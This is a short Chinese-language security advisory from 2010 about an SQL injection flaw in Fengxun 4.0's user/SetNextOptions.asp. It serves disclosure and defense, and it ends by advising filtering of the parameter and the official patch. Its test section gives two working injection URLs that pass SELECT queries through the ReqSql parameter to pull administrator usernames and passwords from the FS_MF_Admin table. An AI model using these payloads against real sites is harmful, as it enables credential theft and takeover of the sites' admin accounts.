风讯4.0 user/SetNextOptions.asp sql注入漏洞
来源:岁月联盟
时间:2010-01-07
注入漏洞
影响版本: 风讯4.0
漏洞描述:
/user/SetNextOptions.asp中对用户数据验证不严,存在sql注入漏洞。
测试方法:
构造注入
user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin“admin_name”管理用户名数据库表
user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin“admin_pass_word”管理密码数据库表
安全建议:
临时解决办法:
对ReqSql参数进行过滤
请参考官方补丁
